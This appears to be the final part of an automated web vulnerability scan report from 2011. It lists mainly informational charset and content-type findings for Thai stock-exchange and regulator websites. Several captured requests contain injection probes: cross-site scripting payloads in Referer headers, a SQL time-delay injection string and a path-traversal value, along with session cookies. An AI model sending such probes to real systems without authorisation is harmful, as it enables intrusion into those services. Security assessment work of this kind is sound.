Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/xcalendar.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

GET /set/xcalendar.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.27. http://www.set.or.th/setresearch/setresearch-search.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/setresearch/setresearch-search.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

GET /setresearch/setresearch-search.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/setresearch/setresearch.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:13 GMT
Server: Apache
Last-Modified: Wed, 15 Jul 2009 07:11:00 GMT
ETag: "53828b-cd1-41df4900"
Accept-Ranges: bytes
Content-Length: 3281
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setresearch/setresearch-style.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.28. http://www.set.or.th/setresearch/setresearch.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/setresearch/setresearch.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:07 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 06:45:19 GMT
ETag: "134f6a-a0de-7bc2ddc0"
Accept-Ranges: bytes
Content-Length: 41182
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SET Research - Thai Capital Market Research Resource</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setresearch/setresearch-style.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.29. http://www.set.or.th/shortcut-en.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/shortcut-en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

GET /shortcut-en.html HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance&c7b03'%3E%3Cscript%3Ealert(1)%3C/script%3Ebdd3572e91d=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:36:38 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2010 02:25:49 GMT
ETag: "cd195-1ccb-44b8e540"
Accept-Ranges: bytes
Content-Length: 7371
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

20.30. http://www.set.or.th/static/news/latestnews_en_US.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/static/news/latestnews_en_US.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

tis-620

Request

Response

20.31. http://www.thai-iod.com/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.thai-iod.com
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Windows-874

Request

GET / HTTP/1.1
Host: www.thai-iod.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html

Response

HTTP/1.1 200 OK
Content-Length: 356
Content-Type: text/html
Content-Location: http://www.thai-iod.com/Index.htm
Last-Modified: Thu, 25 Jun 2009 10:09:03 GMT
Accept-Ranges: bytes
ETag: "ac39bcf77cf5c91:de67"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:02:44 GMT


<html>
<head>
<title>Thai Institute of Directors</title>
<meta http-equiv="Content-Type" content="text/html; charset=Windows-874">
</head>
...[SNIP]...

20.32. http://www.thai-iod.com/en/index.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.thai-iod.com
Path:	/en/index.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

TIS-620

Request

Response

21. Content type incorrectly stated previous next
There are 12 instances of this issue:

http://capital.sec.or.th/webapp/nrs/whatsnew_nrs_th.php
http://capital.sec.or.th/webapp/nrs/whatsnew_th.php
http://lvs.truehits.in.th/goggen.php
http://weblink.settrade.com/customization/IPO/mylib.js
http://www.sec.or.th/images/menu_oooo_03.jpg
http://www.sec.or.th/images/menu_oooo_05.jpg
http://www.sec.or.th/images/menu_oooo_09.jpg
http://www.sec.or.th/images/menu_oooo_13.jpg
http://www.sec.or.th/images/menu_oooo_17.jpg
http://www.sec.or.th/images/menu_oooo_18.jpg
http://www.sec.or.th/images/menu_oooo_20.jpg
http://yesvideo.app101.hubspot.com/salog.js.aspx

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

21.1. http://capital.sec.or.th/webapp/nrs/whatsnew_nrs_th.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://capital.sec.or.th
Path:	/webapp/nrs/whatsnew_nrs_th.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

21.2. http://capital.sec.or.th/webapp/nrs/whatsnew_th.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://capital.sec.or.th
Path:	/webapp/nrs/whatsnew_th.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

21.3. http://lvs.truehits.in.th/goggen.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://lvs.truehits.in.th
Path:	/goggen.php

Issue detail

The response contains the following Content-type statement:

Content-type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /goggen.php?hc=c0002486&bv=0&rf=http%3A//marketdata.set.or.th/head-en.html&test=TEST&web=%2bm9yd4xiL2sRAHTjxRzQBA%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=0E309294.1&fp=&fv=-&truehitspage=en%20-%20Index&truehitsurl=http%3a//www.set.or.th/en/index.html HTTP/1.1
Host: lvs.truehits.in.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: ck3rdparty=1; truehitsid=3zNka1mr

Response

HTTP/1.1 200 OK
Content-type: image/jpeg
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Connection: close
Date: Tue, 03 May 2011 14:23:33 GMT
Server: lighttpd
Content-Length: 91

GIF89a............333....!.......,..........,....=..l.....jzc].Vq.g..0....#.....w9........;

21.4. http://weblink.settrade.com/customization/IPO/mylib.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://weblink.settrade.com
Path:	/customization/IPO/mylib.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /customization/IPO/mylib.js HTTP/1.1
Host: weblink.settrade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://weblink.settrade.com/actions/customization/IPO/setIndexHome.jsp
Cookie: JSESSIONID=844AB8C6A194EAAAC6265B9491D0225C.tcipo2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:38:45 GMT
Server: Unknown
Last-Modified: Thu, 06 Mar 2008 10:52:19 GMT
ETag: "2681a0-2bb8-447c28812bec0"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: application/x-javascript
Content-Length: 11192

var newWindow;
function MakeArray(n) {
   this.length=n;
   for(var i=1; i<=n; i++) {
       this[i]=0
   }
   return this
}

function openWindow(url, windName, nWidth, nHeight)
{
   screenWidth = scree
...[SNIP]...

21.5. http://www.sec.or.th/images/menu_oooo_03.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_03.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_03.jpg HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:28:35 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"636-1187066147000"
Last-Modified: Tue, 14 Aug 2007 04:35:47 GMT
Content-Length: 636
Content-Type: image/jpeg

GIF89a.....A..^....'1$$0"%1#%0".p.t.r&1#.Y..Z.(......p........X..l......!....q. .
.q.......*. O.[.......p.......u.....r..?........w..>.1.A.U.s.e-..[.9...v.s
f....Y.,JmJt....C.?......O.A&1$-~(.u....f
...[SNIP]...

21.6. http://www.sec.or.th/images/menu_oooo_05.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_05.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_05.jpg HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:29:18 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"639-1187066147000"
Last-Modified: Tue, 14 Aug 2007 04:35:47 GMT
Content-Length: 639
Content-Type: image/jpeg

GIF89a.....y.+4(,5)y.v+4)+5).|x.3.....$........$..jc........W.eU................,..z>.cW....KE....2 ..........ji.V2.W4.>.5........t8....i1....^[.
..T,.L-....K*....m8.+.....A#. .......d(..b.`/.~~....
...[SNIP]...

21.7. http://www.sec.or.th/images/menu_oooo_09.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_09.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_09.jpg HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:28:40 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"1082-1187066148000"
Last-Modified: Tue, 14 Aug 2007 04:35:48 GMT
Content-Length: 1082
Content-Type: image/jpeg

GIF89a.......)3')3&+4(*4(...,5)*3'.........v.t............vB
.t:...................}W.kG.|B)(v.............k4.................Y.........t8..........*4'....u;..............`...cg..J!|>............V....
...[SNIP]...

21.8. http://www.sec.or.th/images/menu_oooo_13.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_13.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_13.jpg HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:28:35 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"1105-1187066148000"
Last-Modified: Tue, 14 Aug 2007 04:35:48 GMT
Content-Length: 1105
Content-Type: image/jpeg

GIF89a......./7,07-18.29/............{.x...........t..".....Y..u..j.....[..^..(..#..,..5....."..#..{..P..b.....B..e...........t.....b.................%..2..k..<..F..U..@..`LoL........Y..y..^..\..9....
...[SNIP]...

21.9. http://www.sec.or.th/images/menu_oooo_17.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_17.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_17.jpg HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:28:39 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"1087-1187066148000"
Last-Modified: Tue, 14 Aug 2007 04:35:48 GMT
Content-Length: 1087
Content-Type: image/jpeg

GIF89a.......6;36;2......5;25:2...7;3.......|....................................p....S................................`..H..........\s.07...............................................~....f2.......
...[SNIP]...

21.10. http://www.sec.or.th/images/menu_oooo_18.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_18.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_18.jpg HTTP/1.1
Host: www.sec.or.th
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=thcdf1c'%3balert(1)//9465eb3d2be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:45:45 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"1090-1187066148000"
Last-Modified: Tue, 14 Aug 2007 04:35:48 GMT
Content-Length: 1090
Content-Type: image/jpeg

GIF89a......./7,07-.6+.....x..u/6,...........u...........................V..........t....O".S%...............p9.......................M....................................`.....j..v.....z.............
...[SNIP]...

21.11. http://www.sec.or.th/images/menu_oooo_20.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/images/menu_oooo_20.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/menu_oooo_20.jpg HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:28:34 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
ETag: W/"1186-1187066148000"
Last-Modified: Tue, 14 Aug 2007 04:35:48 GMT
Content-Length: 1186
Content-Type: image/jpeg

GIF89a.......+4(}.y.o.,5)...)3')3&.f.*3'x.....4.....+4).q.....}........f.*4(..................x........w.........z..}....3{...........[.)............Y....f...|.......0..j.....1........F..C..f.........
...[SNIP]...

21.12. http://yesvideo.app101.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://yesvideo.app101.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

22. Content type is not specified previous
There are 2 instances of this issue:

/semreg/List.aspx
/semreg/detail.aspx

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. http://register2.set.or.th/semreg/List.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/List.aspx

Request

POST /semreg/List.aspx?ow=';WAITFOR%20DELAY%20'0:0:0'-- HTTP/1.1
Referer: http://register2.set.or.th/semreg/List.aspx?ow=';WAITFOR%20DELAY%20'0:0:0'--
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Content-Length: 709

__VIEWSTATE=dDwtMTM2Mzc4MzY4NDt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjtpPDU%2bOz47bDx0PDtsPGk8MT47aTwyPjtpPDQ%2bO2k8NT47PjtsPHQ8cDxsPHNyYzs%2bO2w8Li4vaW1hZ2VzL3NldC1sb2dvLWluZGV4LmdpZjs%2bPjs7Pjt0PHA8bDxWaXNp
...[SNIP]...

Response

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:18:00 GMT
X-Powered-By: ASP.NET

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:18:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
...[SNIP]...

22.2. http://register2.set.or.th/semreg/detail.aspx previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/detail.aspx

Request

POST /semreg/detail.aspx?ow=FKH&cs=S0001&sn=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Content-Length: 446

__VIEWSTATE=dDwxMjU5OTQxMDQ4O3Q8O2w8aTwxPjs%2bO2w8dDw7bDxpPDE%2bO2k8Mzc%2bOz47bDx0PDtsPGk8MT47aTwyPjtpPDQ%2bO2k8NT47PjtsPHQ8cDxsPHNyYzs%2bO2w8Li4vaW1hZ2VzL3NldC1sb2dvLWluZGV4LmdpZjs%2bPjs7Pjt0PHA8bDxW
...[SNIP]...

Response

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:01:38 GMT
X-Powered-By: ASP.NET

HTTP/1.1 302 Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:01:38 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /semreg/enroll.aspx?ow=FKH&cs=S0001&sn=../../../../../.
...[SNIP]...

Report generated by XSS.CX at Tue May 03 17:53:52 CDT 2011.